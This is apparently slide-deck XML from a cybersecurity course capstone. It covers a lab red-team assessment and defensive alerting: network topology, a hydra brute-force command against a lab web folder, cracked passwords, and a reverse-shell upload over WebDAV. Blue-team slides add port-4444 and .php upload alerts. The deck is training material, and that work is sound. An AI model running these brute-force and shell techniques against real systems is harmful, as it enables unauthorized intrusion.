          <p:cNvPr id="1240" name="Google Shape;1240;p7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74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kind of alarm can be set to detect future file uploads?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Set an alert for .php files that are uploaded to a server</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="14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What threshold would you set to activate this alarm?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Set an alert for traffic moving through port 4444. This is the default port for meterpreter.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42" name="Google Shape;1242;p74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configuration can be set on the host to block file uploads?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Remove the ability to upload files to the directory over the web interface.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56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Topology </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p5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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7073425" y="910475"/>
            <a:ext cx="1797000" cy="37848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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Range: 00-15-5D-00-04-00 to 00-15-5D-00-04-FF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Netmask: 255.255.240.0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Gateway: 10.0.0.1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1100"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52.179.222.110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Linux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Capstone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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>52.179.222.110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Linux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ELK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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>52.179.222.110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Linux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Kali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57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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1059" name="Google Shape;105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6100"/>
            <a:ext cx="6644375" cy="422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4" name="Google Shape;106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065" name="Google Shape;1065;p58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sp>
        <p:nvSpPr>
          <p:cNvPr id="1066" name="Google Shape;1066;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1851100"/>
            <a:ext cx="85953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Red Team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Security Assessment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67" name="Google Shape;1067;p5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5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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1073" name="Google Shape;1073;p5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Nmap </a:t>
            </a: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identified</a:t>
            </a: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 the following hosts on the network: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74" name="Google Shape;1074;p5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75" name="Google Shape;1075;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="119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{94A5ED31-9146-496D-A2F0-A7DB4BF8CDB4}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2782200"/>
                <a:gridCol w="2782200"/>
                <a:gridCol w="2782200"/>
              </a:tblGrid>
              <a:tr h="40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Hostname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IP Address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Role on Network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Capstone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192.168.1.105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is the vulnerable target VM students will attack. It has filebeat &amp; Metricbeat installed, and forwards logs to the ELK machine.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ELK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192.168.1.100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is the same ELK setup created in Project 1. It holds the Kibana dashboards that are used on Day 2.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Kali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192.168.1.90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is a standard Kali Linux machine for use in the penetration test on Day 1.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6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Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1081" name="Google Shape;1081;p6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The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p6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83" name="Google Shape;1083;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201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{94A5ED31-9146-496D-A2F0-A7DB4BF8CDB4}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
              </a:tblGrid>
              <a:tr h="39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</a:tr>
              <a:tr h="76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Weak Password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After running a brute force attack using hydra, I was able to obtain a password for Ashton: leopoldo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weak password like leopoldo can easily be obtained by running a brute force attack.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Crackable Hash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Ryan’s password was hashed, which was cracked using crackstation.com, a free online hash cracker. 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hashed password is easy to crack, and there are a number of hack crackers on the internet, which can lead to a hacker gaining access into the network.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Insecure Web Server/File Upload Vulnerability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After logging onto the webdav using Ryan’s credentials, I was able to upload a reverse shell to the server to gain access to the flag.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Risks of an file upload vulnerability range from a complete system takeover to an overloaded filebase.  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6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Exploitation: Weak Password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1089" name="Google Shape;1089;p6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61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="3154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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371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 ran a brute force attack using hydra to obtain Ashton’s password. I ran the following command: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hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder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92" name="Google Shape;1092;p61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093" name="Google Shape;1093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094" name="Google Shape;1094;p61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" name="Google Shape;1095;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1096" name="Google Shape;1096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097" name="Google Shape;1097;p61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8" name="Google Shape;1098;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="3154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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428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After running for a few minutes, the brute force attack provided a password: leopoldo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00" name="Google Shape;1100;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1101" name="Google Shape;1101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02" name="Google Shape;1102;p61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3" name="Google Shape;1103;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="32523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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="2371500" cy="3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5" name="Google Shape;110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1575" y="1563000"/>
            <a:ext cx="1831624" cy="294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Exploitation: Crackable Hash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p6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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="3154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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371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After finding the hash for Ryan’s password, I ran the hash through crackstation.net, an online hash cracker.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14" name="Google Shape;1114;p62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115" name="Google Shape;1115;p6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16" name="Google Shape;1116;p62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" name="Google Shape;1117;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1118" name="Google Shape;1118;p6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19" name="Google Shape;1119;p62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0" name="Google Shape;1120;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="3154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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428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When I ran the hash through the hash cracking website, I obtained Ryan’s password: Linux4u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22" name="Google Shape;1122;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1123" name="Google Shape;1123;p6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24" name="Google Shape;1124;p62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5" name="Google Shape;1125;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="32523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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="2371500" cy="3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7" name="Google Shape;112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2750" y="1596250"/>
            <a:ext cx="2268349" cy="291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